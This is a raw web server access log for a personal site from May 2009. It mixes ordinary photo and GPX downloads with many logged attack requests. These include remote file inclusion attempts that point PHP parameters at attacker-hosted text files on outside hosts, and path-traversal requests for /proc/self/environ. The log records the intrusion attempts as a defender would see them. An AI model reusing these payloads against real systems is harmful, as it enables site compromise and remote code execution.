70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080406.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080406.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080224.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080406.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.38.31.50 - - [05/May/2009:11:25:10 -0700] "GET /logs/access_080224.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:11:25:37 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:11:25:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:11:25:42 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:11:25:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.106.254.18 - - [05/May/2009:11:26:00 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.visiondevice.it/cerca/text_content/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.106.254.18 - - [05/May/2009:11:26:04 -0700] "GET /logs/access_080918.log/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.visiondevice.it/cerca/text_content/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.106.254.18 - - [05/May/2009:11:26:04 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.visiondevice.it/cerca/text_content/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:26:22 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:26:22 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:26:22 -0700] "GET /logs/access_081126.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:26:22 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:26:26 -0700] "GET /logs/access_080528.log/index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:26:26 -0700] "GET /logs/index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:26:26 -0700] "GET /logs/access_080708.log/index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:26:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:11:26:30 -0700] "GET /logs/access_090123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:11:26:30 -0700] "GET /logs/access_081227.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:11:26:31 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 200 98194 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:26:31 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:37 -0700] "GET /logs/access_080401.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:38 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:38 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:47 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:47 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:48 -0700] "GET /logs/access_080401.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:26:49 -0700] "GET /logs/access_080425.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
64.157.4.43 - - [05/May/2009:11:26:52 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:26:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.104.35.226 - - [05/May/2009:11:26:59 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MSDigitalLocker; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
218.38.243.71 - - [05/May/2009:11:27:12 -0700] "GET /logs/access_080425.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:28 -0700] "GET /logs/access_080708.log%20%20/index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:28 -0700] "GET /logs/access_080528.log%20%20/index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:31 -0700] "GET /index.php?site1=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 200 42967 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:11:27:31 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 200 42946 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:27:40 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:27:40 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:27:41 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:59 -0700] "GET /logs/access_080919.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:11:27:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:05 -0700] "GET /logs/access_080416.log///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:05 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:05 -0700] "GET /logs///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:06 -0700] "GET /logs///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:07 -0700] "GET /logs/access_080416.log%20%20///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:07 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:07 -0700] "GET /logs/access_081107.log%20%20///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:07 -0700] "GET /logs/access_081107.log///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [05/May/2009:11:28:15 -0700] "GET /logs/access_080512.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:22 -0700] "GET /logs///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:22 -0700] "GET //administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:22 -0700] "GET /logs/access_080416.log///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:28:23 -0700] "GET /logs/access_081107.log///administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:28:26 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:28:26 -0700] "GET /logs/access_080925.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:28:26 -0700] "GET /logs/access_080925.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:28:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:28:31 -0700] "GET /logs/access_080810.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:11:28:42 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:28:46 -0700] "GET /logs/access_080510.log//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:28:46 -0700] "GET /logs/access_080407.log//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:28:46 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:11:28:46 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:29:00 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [05/May/2009:11:29:22 -0700] "GET /logs/access_080810.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.islander90.com/images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
